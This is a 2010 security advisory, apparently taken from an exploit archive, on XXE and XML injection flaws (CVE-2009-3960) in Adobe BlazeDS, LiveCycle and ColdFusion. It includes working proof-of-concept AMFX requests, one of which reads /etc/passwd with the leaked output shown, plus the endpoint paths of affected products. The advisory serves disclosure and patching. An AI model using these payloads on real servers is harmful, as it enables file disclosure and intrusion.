Skip to content
cyberexploits
dosmultipletext

Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities

Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities

Published on 2010-02-22

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/multiple/dos/11529.txt7eac4c3a
raw
   (    , )     (,

  .   `.' ) ('.    ',

   ). , ('.   ( ) (

  (_,) .`), ) _ _,

 /  _____/  / _  \    ____  ____   _____  

 \____  \==/ /_\  \ _/ ___\/  _ \ /     \ 

 /       \/   |    \\  \__(  <_> )  Y Y  \

/______  /\___|__  / \___  >____/|__|_|  /

        \/         \/.-.    \/         \/:wq 

                    (x.0)

                  '=.|w|.='

                  _='`"``=.



		presents..



Multiple Adobe Products

XML External Entity And XML Injection Vulnerabilities



CVE: CVE-2009-3960

Adobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html

Link: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf



+-----------+

|Description|

+-----------+



Security-Assessment.com discovered that multiple Adobe 

products with different Data Services versions are 

vulnerable to XML External Entity (XXE) and XML 

injection attacks. 

XML external Entities injection allows a wide range of

XML based attacks, including local file disclosure, 

TCP scans and Denial of Service condition, which can 

be achieved by recursive entity injection, attribute 

blow up and other types of injection. 

For more information about the implications associated

to this vulnerability, refer to the RFC2518 (17.7 

Implications of XML External Entities): 

http://www.ietf.org/rfc/rfc2518.txt



+--------------+

|Product Review|

+--------------+



Adobe Data Services components provide Flex/RIA 

applications with data messaging, remoting and 

management capabilities.



The discovered vulnerabilities affect the HTTPChannel

 servlet classes which are respectively 

“mx.messaging.channels.HTTPChannel” and 

“mx.messaging.channels.SecureHTTPChannel”. These 

classes are part of the Data Services Messaging 

classes and can be found in the 

flex-messaging-common.jar Java archive.



The HTTPChannel transports data in the AMFX format, 

which is the text-based XML representation of AMF. 

The HTTPChannel endpoints are defined in the 

services-config.xml file, located within the 

Flex/WEB-INF folder of the application. 

By default, the HTTPChannel classes are mapped to 

the following endpoints:



1. http://{server.name}:{server.port}/{context.root}/messagebroker/http

2. https://{server.name}:{server.port}/{context.root}/messagebroker/httpsecure



Note that the HTTPChannel may be mapped to different 

endpoints. 

This depends on the deployed application and the 

framework in use (e.g. BlazeDS, Adobe LiveCycle 

Data Services, etc.).



+--------------------------------------------+

|Exploitation - XML External Entity Injection|

+--------------------------------------------+



XML entities can be declared and included within AMFX

requests passed to the HTTPChannel. The XML parser 

parses the payload and successfully processes 

injected entities.



The following table shows an example of XML external

entity injection which leads to local file disclosure.

The AMFX request is sent via the HTTPChannel endpoint

in BlazeDS.



XML External Entity Injection – Local File Disclosure

PoC – BlazeDS – Request



POST /samples/messagebroker/http HTTP/1.1

Content-type: application/x-amf



<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>

<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">

  <body>

    <object type="flex.messaging.messages.CommandMessage">

      <traits>

        <string>body</string><string>clientId</string><string>correlationId</string>

        <string>destination</string><string>headers</string><string>messageId</string>

        <string>operation</string><string>timestamp</string><string>timeToLive</string>

      </traits><object><traits />

      </object>

      <null /><string /><string />

      <object>

        <traits>

          <string>DSId</string><string>DSMessagingVersion</string>

        </traits>

        <string>nil</string><int>1</int>

      </object>

      <string>&x3;</string>

<int>5</int><int>0</int><int>0</int>

    </object>

  </body>

</amfx>





XML External Entity Injection – Local File Inclusion

PoC – BlazeDS – Response



<?xml version="1.0" encoding="utf-8"?>

<amfx ver="3"><header name="AppendToGatewayUrl" mustUnderstand="true">

<string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header>

<body targetURI="/onResult" responseURI="">

<object type="flex.messaging.messages.AcknowledgeMessage">

<traits><string>timestamp</string><string>headers</string>

<string>body</string><string>correlationId</string>

<string>messageId</string><string>timeToLive</string>

<string>clientId</string><string>destination</string>

</traits><double>1.257387140632E12</double><object>

<traits><string>DSMessagingVersion</string>

<string>DSId</string></traits><double>1.0</double>

<string>BDE929FE-270D-3B56-1061-616E8B938429</string>

</object><null/><string>root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

[...]





The above injection was successfully tested on 

multiple Adobe products, as shown below:



1. Product: Adobe BlazeDS 3.2.0.39

Linux Ubuntu 9.04 / Tomcat 6.0.14



Endpoint URIs:



{server.name}:{server.port}/

{context.root}/messagebroker/http

{server.name}:{server.port}/

{context.root}/messagebroker/httpsecure	



Methods: POST, GET

Protocols: HTTP, HTTPS





2. Adobe LiveCycle Data Services ES2 3.0

Windows XP SP2 / Tomcat 6.0.14



Endpoint URIs:



{server.name}:{server.port}/

{context.root}/messagebroker/http

{server.name}:{server.port}/

{context.root}/messagebroker/httpsecure	



Methods: POST, GET

Protocols: HTTP, HTTPS



3. ColdFusion 9.0

Windows XP SP2 / Tomcat 6.0.14



Endpoint URIs:



{server.name}:{server.port}/

{context.root}/flex2gateway/http

{server.name}:{server.port}/

{context.root}/flex2gateway/httpsecure	



Methods: POST, GET

Protocols: HTTP, HTTPS



4. Adobe LiveCycle ES2

Windows XP SP2 / IBM Websphere 7.0



Endpoint URIs:



{server.name}:{server.port}/

{context.root}/messagebroker/http

{server.name}:{server.port}/

{context.root}/messagebroker/httpsecure	



Methods: POST, GET

Protocols: HTTP, HTTPS



The vendor has released several patches for this 

vulnerability. See the Solution section of this 

document for more information.



+----------------------------+

|Exploitation - XML Injection|

+----------------------------+



The XML parser lacks of proper input and output 

validation controls. Security-Assessment.com managed

to inject arbitrary XML content which was returned

in the XML response. 

The following table shows an XML injection in the 

BlazeDS HTTPChannel. The injected payload becomes 

part of the response. In this case, injection is 

possible via the “responseURI” attribute.



XMLInjection – BlazeDS - Request



POST /samples/messagebroker/http HTTP/1.1

Content-type: application/x-amf



<?xml version="1.0" encoding="utf-8"?>

<amfx ver="3"><body targetURI="" responseURI="d" injectedattr="anything"><null/>

</body></amfx>



XMLInjection – BlazeDS - Response



<?xml version="1.0" encoding="utf-8"?>

<amfx ver="3"><body targetURI="d" injectedattr="anything" responseURI=""><null/></body></amfx></body></amfx>



The above injection was successfully tested on 

multiple Adobe products, as shown below:



1. Product: Adobe BlazeDS 3.2.0.39

Linux Ubuntu 9.04 / Tomcat 6.0.14



Endpoint URIs:



{server.name}:{server.port}/

{context.root}/messagebroker/http

{server.name}:{server.port}/

{context.root}/messagebroker/httpsecure	



Methods: POST, GET

Protocols: HTTP, HTTPS





2. Adobe LiveCycle Data Services ES2 3.0

Windows XP SP2 / Tomcat 6.0.14



Endpoint URIs:



{server.name}:{server.port}/

{context.root}/messagebroker/http

{server.name}:{server.port}/

{context.root}/messagebroker/httpsecure	



Methods: POST, GET

Protocols: HTTP, HTTPS



3. ColdFusion 9.0

Windows XP SP2 / Tomcat 6.0.14



Endpoint URIs:



{server.name}:{server.port}/

{context.root}/flex2gateway/http

{server.name}:{server.port}/

{context.root}/flex2gateway/httpsecure	



Methods: POST, GET

Protocols: HTTP, HTTPS



4. Adobe LiveCycle ES2

Windows XP SP2 / IBM Websphere 7.0



Endpoint URIs:



{server.name}:{server.port}/

{context.root}/messagebroker/http

{server.name}:{server.port}/

{context.root}/messagebroker/httpsecure	



Methods: POST, GET

Protocols: HTTP, HTTPS





The vendor has released several patches for this 

vulnerability. See the Solution section of this 

document for more information.





+--------+

|Solution|

+--------+



Security-Assessment.com follows responsible

disclosure and promptly contacted the vendor after 

discovering the issues. The vendor was contacted on 

the 6th November 2009 and a reply was received on the

same day. The vendor released security patches on 

the 11th February 2010.

  

The security patches can be downloaded at the 

following website: 



http://www.adobe.com/support/security/bulletins/apsb10-05.html





+------+

|Credit|

+------+



Discovered and advised to Adobe in

November 2009 by Roberto Suggi Liverani of Security-

Assessment.com. Personal Page: http://malerisch.net/



For full details regarding this vulnerability

download the PDF from our website:



http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf





+---------+

|Greetings|

+---------+



Bug found at Hack in The Sun 2009, Waiheke Island.





+-----------------------------+

|About Security-Assessment.com|

+-----------------------------+



Security-Assessment.com is a New Zealand based world

leader in web application testing, network security

and penetration testing. Security-Assessment.com

services organisations across New Zealand, Australia,

Asia Pacific, the United States and the United

Kingdom.



Roberto Suggi Liverani





View on GitHub